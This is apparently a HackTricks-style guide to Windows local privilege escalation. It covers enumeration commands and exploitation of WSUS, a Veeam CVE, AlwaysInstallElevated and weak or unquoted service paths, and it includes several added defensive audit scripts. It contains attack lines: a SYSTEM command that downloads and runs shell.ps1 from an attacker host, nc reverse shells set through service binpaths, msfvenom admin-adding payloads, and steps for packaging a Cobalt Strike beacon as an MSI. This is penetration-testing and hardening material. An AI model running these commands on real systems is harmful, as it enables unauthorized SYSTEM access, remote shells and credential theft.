Windows Local Privilege Escalation
Best tool to look for Windows local privilege escalation vectors: WinPEAS
Initial Windows Theory
Access Tokens
If you don't know what Windows Access Tokens are, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
Check the following page for more information about ACLs - DACLs/SACLs/ACEs:
Integrity Levels
If you don't know what integrity levels in Windows are, you should read the following page before continuing:
Windows Security Controls
There are different things in Windows that could prevent you from enumerating the system, running executables or even detecting your activities. You should read the following page and enumerate all these defence mechanisms before starting the privilege escalation enumeration:
Admin Protection / UIAccess silent elevation
UIAccess processes launched via RAiLaunchAdminProcess can be abused to reach High IL without a prompt when the AppInfo secure-path checks are bypassed. See the dedicated UIAccess/Admin Protection bypass flow here:
Uiaccess Admin Protection Bypass
System Info
Version info enumeration
Check whether the Windows version has any known vulnerability (also check which patches are applied).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
This site is handy for searching out detailed information about Microsoft security vulnerabilities. The database holds more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas has watson embedded)
Locally (with the system info)
GitHub repos of exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Environment
Any credentials or other juicy info saved in the environment variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript Files
You can learn how to turn this on at https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Details of PowerShell pipeline executions are recorded, including the executed commands, command invocations and parts of scripts. However, full execution details and output results might not be captured.
To enable this, follow the instructions in the "Transcript files" section of the documentation, choosing "Module Logging" instead of "PowerShell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
To view the last 15 events from the PowerShell logs, you can execute:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
A complete record of the activity and the full content of the script's execution is captured, ensuring that every block of code is documented as it runs. This preserves a comprehensive audit trail of each activity, valuable for forensics and for analysing malicious behaviour. Because everything is documented at execution time, detailed insight into the process is available afterwards.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Script Block logging events can be found in the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Internet Settings
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
You can compromise the system if the updates are not requested over HTTPS but over plain HTTP.
Start by checking whether the network uses a non-SSL WSUS update server by running the following in cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Or the following in PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If you get a reply such as one of these:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equal to 1.
Then it is exploitable. If that last registry value is equal to 0, the WSUS entry is ignored.
To exploit this vulnerability you can use tools like Wsuxploit or pyWSUS. These are MiTM weaponized exploit scripts that inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer's settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user's settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user's certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it is released).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker-controlled server and the updater trusts a rogue root CA or performs weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See the generalised technique (based on the Netskope stAgentSvc chain, CVE-2025-0309) here:
Veeam Backup & Replication CVE-2023-27532 (SYSTEM via TCP 9401)
Veeam B&R < 11.0.1.1261 exposes a localhost service on TCP/9401 that processes attacker-controlled messages, allowing arbitrary commands as NT AUTHORITY\SYSTEM.
- Recon: confirm the listener and the version, e.g. netstat -ano | findstr 9401 and (Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe").VersionInfo.FileVersion.
- Exploit: drop a PoC such as VeeamHax.exe together with the required Veeam DLLs in the same directory, then trigger the SYSTEM payload through the local socket:
.\VeeamHax.exe --cmd "powershell -ep bypass -c \"iex(iwr http://attacker/shell.ps1 -usebasicparsing)\""
The service runs the command as SYSTEM.
KrbRelayUp
There is a local privilege escalation vulnerability in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users hold self-rights that allow them to configure Resource-Based Constrained Delegation (RBCD), and users are able to create computers within the domain. Note that these requirements are met with the default settings.
Find the exploit at https://github.com/Dec0ne/KrbRelayUp
For more information about the attack flow see https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registry values are enabled (value is 0x1), users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
If you have a meterpreter session you can automate this technique with the module exploit/windows/local/always_install_elevated
PowerUP
Use the Write-UserAddMSI command from PowerUP to create, inside the current directory, a Windows MSI binary to escalate privileges. The script writes out a precompiled MSI installer that prompts for a user/group to add (so you will need GUI access):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create an MSI wrapper using these tools. Note that you can wrap a ".bat" file if you just want to execute command lines.
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
- Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
- Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties change TargetPlatform from x86 to x64.
- There are other properties you can change, such as Author and Manufacturer, which can make the installed app look more legitimate.
- Right-click the project and select View > Custom Actions.
- Right-click Install and select Add Custom Action.
- Double-click Application Folder, select your beacon.exe file and click OK. This ensures that the beacon payload is executed as soon as the installer is run.
- Under Custom Action Properties, change Run64Bit to True.
- Finally, build it.
- If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.
MSI Installation
To install the malicious .msi file in the background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention to them:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding: it is interesting to know where the logs are sent
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised and regularly updated on domain-joined computers. These passwords are stored securely within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorised.
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system.
More info about LSA Protection here
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard was introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks. More info about Credential Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials are authenticated by the Local Security Authority (LSA) and used by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
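The registry checks scattered through the WSUS, AlwaysInstallElevated, WDigest, LSA Protection, Credential Guard, Cached Credentials and PowerShell logging sections above, folded into one audit script that reports what needs hardening. This is an added example, not HackTricks' own code; the value names are the ones the page queries plus EnableScriptBlockLogging for the script-block logging policy, and the function names are my own.

```powershell
# Added example (not HackTricks' code): audits the registry settings discussed on this page and
# returns findings a defender can remediate. Run elevated so every HKLM key is readable.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value does not exist instead of throwing.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function New-Finding {
    param([string]$Check, [string]$Status, [string]$Detail)
    [pscustomobject]@{ Check = $Check; Status = $Status; Detail = $Detail }
}

function Get-PrivescHardeningFindings {
    $findings = @()

    # 1. WSUS: a plain-HTTP WUServer that is actually used (UseWUServer=1) allows update MITM.
    $wu  = Get-RegValue 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' 'WUServer'
    $use = Get-RegValue 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' 'UseWUServer'
    if ($wu -and $use -eq 1 -and $wu -match '^http://') {
        $findings += New-Finding 'WSUS' 'WEAK' "WUServer=$wu is used over plain HTTP; change the policy to https://"
    } elseif ($wu) {
        $findings += New-Finding 'WSUS' 'OK' "WUServer=$wu (UseWUServer=$use)"
    }

    # 2. AlwaysInstallElevated: both HKLM and HKCU must be 1 for MSI packages to run as SYSTEM.
    $aieM = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $aieU = Get-RegValue 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    if ($aieM -eq 1 -and $aieU -eq 1) {
        $findings += New-Finding 'AlwaysInstallElevated' 'WEAK' 'Set both HKLM and HKCU values to 0 or remove the policy'
    } else {
        $findings += New-Finding 'AlwaysInstallElevated' 'OK' "HKLM=$aieM HKCU=$aieU"
    }

    # 3. WDigest: UseLogonCredential=1 keeps plaintext passwords in LSASS.
    $wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    if ($wd -eq 1) { $findings += New-Finding 'WDigest' 'WEAK' 'UseLogonCredential=1; set it to 0' }
    else           { $findings += New-Finding 'WDigest' 'OK'   "UseLogonCredential=$wd" }

    # 4. LSA Protection (RunAsPPL 1 or 2) and Credential Guard (LsaCfgFlags 1 or 2); absent means off.
    $ppl = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
    $findings += New-Finding 'LSA Protection' $(if ($ppl -in 1,2) { 'OK' } else { 'WEAK' }) "RunAsPPL=$ppl"
    $cg = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'LsaCfgFlags'
    $findings += New-Finding 'Credential Guard' $(if ($cg -in 1,2) { 'OK' } else { 'INFO' }) "LsaCfgFlags=$cg"

    # 5. Cached domain logons: lower the count on machines that never need offline logon.
    $cached = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount'
    $findings += New-Finding 'CachedLogonsCount' 'INFO' "CachedLogonsCount=$cached"

    # 6. Script Block logging provides the audit trail described above; flag it when it is off.
    $sbl = Get-RegValue 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' 'EnableScriptBlockLogging'
    $findings += New-Finding 'ScriptBlockLogging' $(if ($sbl -eq 1) { 'OK' } else { 'WEAK' }) "EnableScriptBlockLogging=$sbl"

    return $findings
}

Get-PrivescHardeningFindings | Format-Table -AutoSize
```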
Users & Groups
Enumerate Users & Groups
Check whether any of the groups you belong to have interesting permissions:
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
If you belong to a privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what a token is on this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
qwinsta
klist sessions
Home folders
dir C:\Users
Get-ChildItem C:\Users
Password Policy
net accounts
Get the content of the clipboard
powershell -command "Get-Clipboard"
Running Processes
File and Folder Permissions
First of all, when listing the processes check for passwords inside the command line of each process.
Check whether you can overwrite a running binary or whether you have write permissions on the binary's folder, to exploit possible DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Always check for running electron/cef/chromium debuggers; you could abuse them to escalate privileges.
Checking permissions of the process binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Checking permissions of the folders of the process binaries (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
Memory Password Mining
You can create a memory dump of a running process using procdump from Sysinternals. Services like FTP keep credentials in clear text in memory; try dumping the memory and reading the credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Applications running as SYSTEM may allow a user to spawn a CMD or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click "Click to open Command Prompt"
Services
Service Triggers allow Windows to start a service when certain conditions occur (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Even without SERVICE_START rights, you can often start privileged services by firing their triggers. See enumeration and triggering techniques here:
Get a list of services:
net start
wmic service list brief
sc query
Get-Service
Permissions
You can use sc to get information about a service
sc qc <service_name>
It is recommended to have the accesschk binary from Sysinternals to check the privilege level required for each service.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
It is recommended to check whether "Authenticated Users" can modify any service:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP from here
Enable service
If you get this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Take into account that the service upnphost depends on SSDPSRV to work (on XP SP1)
Another workaround for this problem is running:
sc.exe config usosvc start= auto
Modify service binary path
In the scenario where the "Authenticated users" group has SERVICE_ALL_ACCESS on a service, the service's executable binary can be modified. To modify it and execute sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Restart service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Privileges can be escalated through various permissions:
- SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.
- WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.
- WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.
- GENERIC_WRITE: Inherits the ability to change service configurations.
- GENERIC_ALL: Also inherits the ability to change service configurations.
For the detection and exploitation of this vulnerability, exploit/windows/local/service_permissions can be used.
Weak permissions on service binaries
Check whether you can modify the binary executed by a service or whether you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary executed by a service using wmic (excluding those in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
You can also use sc and icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Service registry modify permissions
You should check whether you can modify any service registry key.
You can check your permissions over a service registry key by running:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Check whether Authenticated Users or NT AUTHORITY\INTERACTIVE have FullControl permissions. If so, the binary executed by the service can be changed.
To change the path of the executed binary:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
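An added example, not HackTricks' code, that audits the two things the preceding sections check with accesschk, icacls and reg: each service's DACL (read with sc.exe sdshow and parsed as SDDL) and the ACL of its registry key, reporting the rights listed above whenever they are granted to Everyone, Authenticated Users, INTERACTIVE or BUILTIN\Users. Function and variable names are my own; the access-mask constants are the documented winsvc.h/winnt.h values.

```powershell
# Added example (not HackTricks' code): finds services that low-privilege principals can
# reconfigure, either through the service object's DACL or through its registry key ACL.
# Run elevated for complete results.

$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# Access-mask bits that let a caller change the service configuration (winsvc.h / winnt.h).
$DangerousServiceRights = @{
    SERVICE_CHANGE_CONFIG = 0x00000002
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_WRITE         = 0x40000000
    GENERIC_ALL           = 0x10000000
}

function Get-WeakServiceAce {
    param([Parameter(Mandatory)][string]$Name)
    # sc.exe sdshow prints a blank line followed by the SDDL string; keep only the SDDL.
    $sddl = (& sc.exe sdshow $Name | Where-Object { $_ -match '^[DO]:' }) -join ''
    if (-not $sddl) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow-ACEs for the low-privilege SIDs matter here.
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        $hits = $DangerousServiceRights.GetEnumerator() |
            Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
            ForEach-Object { $_.Key }
        if ($hits) {
            [pscustomobject]@{
                Service   = $Name
                Principal = $LowPrivSids[$sid]
                Rights    = ($hits -join ',')
                Source    = 'service DACL'
            }
        }
    }
}

function Get-WeakServiceRegistryAce {
    param([Parameter(Mandatory)][string]$Name)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $acl = Get-Acl -Path $key -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $sid = $null
        try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch {}
        if (-not $sid -or -not $LowPrivSids.ContainsKey($sid)) { continue }
        # SetValue (or FullControl, which includes it) is enough to rewrite ImagePath.
        $rights   = [int]$rule.RegistryRights
        $setValue = [int][System.Security.AccessControl.RegistryRights]::SetValue
        if (($rights -band $setValue) -ne 0) {
            [pscustomobject]@{
                Service   = $Name
                Principal = $LowPrivSids[$sid]
                Rights    = $rule.RegistryRights.ToString()
                Source    = 'registry key'
            }
        }
    }
}

function Get-WeakServiceConfiguration {
    foreach ($svc in Get-Service) {
        Get-WeakServiceAce -Name $svc.Name
        Get-WeakServiceRegistryAce -Name $svc.Name
    }
}

Get-WeakServiceConfiguration | Format-Table -AutoSize
```

Each reported line is a service whose ImagePath a standard user could change; the remediation is to remove that ACE with sc.exe sdset or by editing the key's ACL, not to rely on the binary's own permissions.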
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry key it means you can create sub-keys under it. In the case of Windows services this is enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
If the path to an executable is not enclosed in quotes, Windows will try to execute every prefix that ends before a space.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
List all unquoted service paths, excluding those belonging to built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32" | findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:"\""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path. You can also create a service binary manually with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
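An added example (not HackTricks' code) that reproduces the lookup order described above as a pure function, lists the unquoted service paths on the host with Get-CimInstance, and quotes the ImagePath as the fix. The function names are my own; Repair-UnquotedServicePath needs administrator rights and supports -WhatIf.

```powershell
# Added example (not HackTricks' code): how Windows resolves an unquoted ImagePath, which
# services on this host are affected, and how to fix them by quoting the executable.

function Get-UnquotedPathCandidates {
    param([string]$ImagePath)
    # Only the part up to the executable name is ambiguous; arguments after it are dropped.
    $exePart = $ImagePath
    $m = [regex]::Match($ImagePath, '(?i)^.*?\.exe\b')
    if ($m.Success) { $exePart = $m.Value }
    $parts = $exePart -split ' '
    $candidates = @()
    for ($i = 1; $i -le $parts.Count; $i++) {
        $prefix = ($parts[0..($i - 1)] -join ' ')
        # Every intermediate prefix is tried with .exe appended; the last one is the real binary.
        if ($i -lt $parts.Count) { $candidates += "$prefix.exe" } else { $candidates += $prefix }
    }
    return $candidates
}

function Get-UnquotedServicePath {
    # Services whose path contains a space, does not start with a quote and is outside C:\Windows.
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and
        $_.PathName -match ' ' -and $_.PathName -notlike 'C:\Windows\*'
    } | ForEach-Object {
        [pscustomobject]@{
            Name       = $_.Name
            StartMode  = $_.StartMode
            PathName   = $_.PathName
            Candidates = (Get-UnquotedPathCandidates $_.PathName) -join '; '
        }
    }
}

function Repair-UnquotedServicePath {
    # Rewrites ImagePath with the executable quoted; any arguments stay outside the quotes.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $path = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    $m = [regex]::Match($path, '(?i)^(.*?\.exe)\b(.*)$')
    if (-not $m.Success -or $path.StartsWith('"')) { return $path }
    $fixed = '"' + $m.Groups[1].Value + '"' + $m.Groups[2].Value
    if ($PSCmdlet.ShouldProcess($Name, "set ImagePath to $fixed")) {
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
    }
    return $fixed
}

# Worked example with the path from the text (no service is touched here): yields the
# three candidates listed above, from C:\Program.exe to the real Service.exe.
Get-UnquotedPathCandidates 'C:\Program Files\Some Folder\Service.exe'
Get-UnquotedServicePath | Format-Table -AutoSize
```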
Recovery Actions
Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If that binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.
Applications
Installed Applications
Check the permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Check whether you can modify some config file to read a special file, or whether you can modify a binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/file permissions on the system is to run:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
